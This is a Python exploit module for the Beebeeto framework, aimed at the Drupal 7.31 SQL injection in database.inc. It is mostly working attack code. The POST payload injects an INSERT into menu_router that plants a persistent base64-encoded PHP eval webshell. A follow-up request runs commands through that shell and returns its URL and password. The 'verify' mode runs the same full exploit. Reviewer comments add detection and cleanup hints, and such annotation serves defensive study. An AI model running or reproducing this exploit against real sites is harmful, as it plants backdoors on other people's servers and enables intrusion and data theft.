http://www.beebeeto.com/pdb/poc-2014-0100/
#!/usr/bin/env python
# coding=utf-8
"""
Site: http://www.beebeeto.com/
Framework: https://github.com/ff0000team/Beebeeto-framework
"""
# Vulnerability write-up (Chinese): https://www.ricter.me/posts/Drupal%20%E7%9A%84%20callback%20%E5%99%A9%E6%A2%A6
import urllib
import urllib2

from baseframe import BaseFrame


class MyPoc(BaseFrame):
    """Beebeeto PoC module for the Drupal <=7.31 database.inc SQL injection.

    Per ``poc_info['vul']['desc']`` below, database.inc expands array-valued
    query parameters into an IN (...) list and carries the array *keys* into
    the SQL text, which is the injection point this module uses.

    NOTE(review): both ``exploit`` and ``verify`` (an alias, see bottom of the
    class) write a row into the target's menu_router table and leave a
    persistent PHP backdoor reachable over HTTP. Neither mode is a passive
    version check; treat any run of this module as an intrusion, and note that
    patching the injection does not remove a row that was already inserted.
    """

    poc_info = {
        # PoC metadata
        'poc': {
            'id': 'poc-2014-0100',
            'name': 'Drupal 7.31 GetShell via /includes/database/database.inc SQL Injection Exploit',
            'author': 'Ricter',
            'create_date': '2014-10-21',
        },
        # Protocol metadata
        'protocol': {
            'name': 'http',
            'port': [80],
            'layer3_protocol': ['tcp'],
        },
        # Vulnerability metadata
        'vul': {
            'app_name': 'Drupal',
            'vul_version': ['<=7.31'],
            'type': 'Code Execution',
            'tag': ['Drupal漏洞', '代码执行漏洞', 'SQL注入漏洞', 'PHP', 'GETSHELL'],
            'desc': '''
Drupal 7.31 /includes/database/database.inc在处理IN语句时,展开数组时key带入SQL语句导致SQL注入,
可以添加管理员、造成信息泄露,利用特性也可 getshell。
''',
            'references': ['https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html'],
        },
    }

    @classmethod
    def exploit(cls, args):
        """Run the PoC against ``args['options']['target']`` and report in ``args``.

        Reads:
            args['options']['target']  -- base URL of the Drupal site
            args['options']['verbose'] -- when truthy, echo the request to stdout
        Writes:
            args['success'] (bool); on success also
            args['poc_ret']['vul_url'], args['poc_ret']['Webshell'],
            args['poc_ret']['Webshell_PWD'].
        Returns:
            The same ``args`` dict.
        Raises:
            Whatever urllib2 raises on a failed request (URLError/HTTPError);
            nothing here catches them.

        NOTE(review): this is destructive. The first request INSERTs a
        menu_router row whose ``path`` is a literal ``<?php eval(...)?>``
        string and whose ``page_callback`` is ``php_eval``; the second request
        then executes code through that row. Defenders can detect a prior run
        by looking for menu_router rows with page_callback = 'php_eval' or a
        path containing '<?php', and for POST bodies whose parameter *names*
        contain SQL (``name[0;insert into menu_router ...]``). Remediation is
        the referenced advisory plus removal of any injected row.
        """
        url = args['options']['target']
        # URL the backdoor answers on once the injected row exists: Drupal
        # routes ?q= against menu_router.path, and the injected path is the
        # PHP string below.
        webshell_url = url + '/?q=<?php%20eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>'
        # POST body for the user_login_block form. The SQL rides in the key of
        # the name[] array parameter (see the class docstring); the '#' after
        # the INSERT comments out the remainder of the original query.
        payload = "name[0;insert into menu_router (path, page_callback, access_callback, " \
                  "include_file, load_functions, to_arg_functions, description) values ('<" \
                  "?php eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>','php_eval', '1', '" \
                  "modules/php/php.module', '', '', '');#]=test&name[0]=test2&pass=test&fo" \
                  "rm_id=user_login_block"
        if args['options']['verbose']:
            print '[*] Request URL: ' + url
            print '[*] POST Content: ' + payload
        # Request 1: deliver the injection. The response body is discarded and
        # no status check is made, so a failed injection is only noticed by the
        # marker check below.
        urllib2.urlopen(url, data=payload)
        # Request 2: POST a marker command to the backdoor (parameter 'e') and
        # look for the reversed marker in the response.
        request = urllib2.Request(webshell_url, data="e=echo strrev(gwesdvjvncqwdijqiwdqwduhq);")
        response = urllib2.urlopen(request).read()
        if 'gwesdvjvncqwdijqiwdqwduhq'[::-1] in response:
            args['success'] = True
            args['poc_ret']['vul_url'] = url
            args['poc_ret']['Webshell'] = webshell_url
            # 'e' is the POST parameter name the backdoor evaluates.
            args['poc_ret']['Webshell_PWD'] = 'e'
            return args
        args['success'] = False
        return args

    # NOTE(review): verify is the full exploit, not a non-destructive probe;
    # the framework's "verify" mode therefore also plants the backdoor.
    verify = exploit


if __name__ == '__main__':
    from pprint import pprint
    # BaseFrame.run is defined in the framework (not shown here); presumably it
    # parses CLI options into args and dispatches to verify/exploit.
    mp = MyPoc()
    pprint(mp.run())